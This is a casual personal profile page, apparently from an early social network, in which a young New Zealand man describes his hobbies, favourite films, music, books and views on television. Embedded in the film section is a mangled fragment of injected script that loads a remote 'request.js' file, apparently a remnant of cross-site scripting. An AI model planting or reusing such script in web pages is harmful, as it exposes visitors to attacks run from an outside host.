Viathan profile picture


Just another freak, In the freak kingdom

About Me

Hmm what can I say about me? Theres not alot to say. Im a 21 year old male from New Zealand. I hate the idea of working for a large company which i slave at 40 hours a week but I like the money and it gets me materialistc things that I enjoy quite alot.I am almost hardwired into my computer and enjoy reading, watching movies and playing around on my computer. My favourite food is Lasagna and right now im listening to M83 - GoneI'm on msn most of the time [email protected] and enjoy meeting new people. So if you stumble across my profile and want to chat feel free to message me.Thought I better update this as last time it was updated it said I was 19 :SI collect Action figures which is almost too large a collection of and also a modest collection of weaponry. Everything from replica guns to knives and swords. Abit expencive but its quite a fun collection and its not something most people collect.I play TG which is short for Tactical Games - using RAM which is Real Action Markers. It's a scenario style paintball. I've got an M4 carbine with optical sights and a Sig Sauer P226 as my sidearm. Home | Browse | Search | Invite | Film | Mail | Blog | Favorites | Forum | Groups | Events | Videos | Music | Comedy | Classifieds

My Interests

I am interested in everything that poses interest from Religous discussion (not debate and only if the other person is willing to listen as well) as well as politics (again only if the other person is willing to lisen to an objective oppinion which isn't often the case) My primary interest lies in my computer named Saffron. Shes my relief and my curse as she occupies alot of my free time.

I'd like to meet:

I don't know really the meaning of the question. As in the kind of person im looking for in a partner or as in famous people (living and dead) wise.I think the second is more interesting: I'd like to meet Bruce Campbell, Castro, Stalin, Mark Z Danielewski, Hunter S Thompson, Frank Miller, James Earl Jones, Patrick Stewart, Bill Gates, Stan Lee,Christopher Walken, Alec Guiness, Sun Tsu, Steven Hawlking.


Favourite bands Skinny Puppy and Iron Maiden. Though I like all music with the exception of R&B/Rap/Hip-Hop and western popmusic


I get asked alot what my favourite movies are and I always find this a difficult question as there are so many good movies out there that can't really be considered on the same scale as each other. Sin City is by far my most recient favourite. A dark tale of love and revenge. Highly worth seeing with more famous actors than you can shake a stick at.I also like The Fountain, Stargate, Lord of the Rings, Predator, American Physco, Starwars, Mystery Science Theater 3000, The Alien Trillogy and many others which I don't care to list as theres far too many.I also find as I use to be a film student I have become more critical of films but as a whole I find that even no brainers can be fun as long as you accept them for what they are..... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("{}");}..


Television has for me been one of the biggest let-downs of the 21st Centuary. I don't know about over seas but certainly over here we have been bombarded by Reality TV shows like Survivor and when thats not on 1001 extreme makeover shows that New Zealand like to produce. WOW YOUR AN GOOD MAN IN THE COMMUNITY! LETS TAKE YOU AWAY FOR A DAY AND FIX UP YOUR GARDEN! w00t.Occasionally you'll get a decient show but unfortunatly they're few and far between these days. Most of the good shows they play are reruns of shows from back in the 20th. The only show I now watch is Boston Legal. All else is forsaken to me.


I love reading and have an ever growing library of them! THOUGH OF ALL THAT I HAVE READ THERE IS ONE THAT SHINES ABOVE ALL ELSE... NOT SO MUCH SHINES AS A SHIMMER.. ONLY DARK LIKE A ROOM... House of Leaves - Mark Z Danielewski: I highly recomend this book as the best book I have ever read and after having read alot reciently this one I still rate it as no. 1 A haunted house story narrated by a strange man who is trying to peice it togeather. Both the inside story and his wrap around story have you gasping for more.. and the best part about it is that he presents you with all the facts and not a resoloution eg, "it was old man withers who runs the ammusment park" you have to come to your own conclusions which give it the ability for you to be thinking about this book months after you read it! A book that must be read more than once to even grasp the many many layers and every time you discuss it it your perception shifts with it making the book seem alot different than it did last you thought about it.The second series I've been reading has beenThe Wheel of Time - Robert Jordan: A very heavy and very long fantasy series that spans 11 books at current. He writes in such a way that you don't loose interest but you can feel the length of their journey and theres no short cuts. I've got the whole series on 11 books in hard cover as well as the prequil A New spring also in hard cover. And it rates as my favourite fantasy series of all time.


It doesn't seem to me like there are any real heros anymore... I mean people are just all riding the wave of life. None of us have that much control over it. "The Wheel Weaves As The Wheel Wills" and I can't really think of anyone who has really earned in recient history the ideal of a hero...